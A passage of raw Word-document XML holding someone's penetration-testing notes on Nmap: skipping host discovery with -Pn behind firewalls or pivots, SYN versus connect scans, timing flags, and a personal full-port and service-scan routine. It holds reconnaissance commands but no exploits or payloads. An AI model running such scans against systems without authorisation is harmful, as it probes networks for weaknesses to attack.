    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP is blocked by firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You’re scanning through a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tunnel/pivot (like Ligolo, Chisel, SSH tunnel)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where ping might not work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You don’t want to miss machines that drop ICMP but still have open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downside: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">waste time scanning dead hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it assumes all are up.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP vs. SUDO:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, if you run as root/administrator, Nmap prefers SYN scan (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), which is also called a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">half‑open scan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It only sends a TCP SYN packet and doesn’t complete the handshake. This is faster and stealthier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run without root privileges, Nmap falls back to a TCP connect scan (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), which uses the operating system’s connect() call to complete the full 3‑way handshake (SYN → SYN/ACK → ACK). That’s slower and easier to detect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> explicitly tells Nmap: do a TCP Connect scan, even if SYN scan is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's going too slow, add this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--min-rate 10000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send at least 10,000 packets per second</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-T4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-T3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--reason</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps us understand why ports are returned as open, open|filtered, or closed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002900">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002901">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002902">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My routine:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002903">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find all the ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002905">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sC -sV -p [insert ports from previous scan] [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002906">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC -sV -p 22,80,3000 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002907">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002908">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maybe try this one for TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002909">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -n -sC -sV -p- $IP --open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as it defaults to the faster half-open SYN scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ignore ping and assume it is up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to never do DNS resolution, which slows things down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this means you don't see hostnames, which might be important so think about deleting this flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MOST importantly the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--open </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">argument to only apply scripts and version scans to find open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000290F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -sC -sV -p- $IP --open</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one has DNS resolution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002911">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002912">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maybe try this one for UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
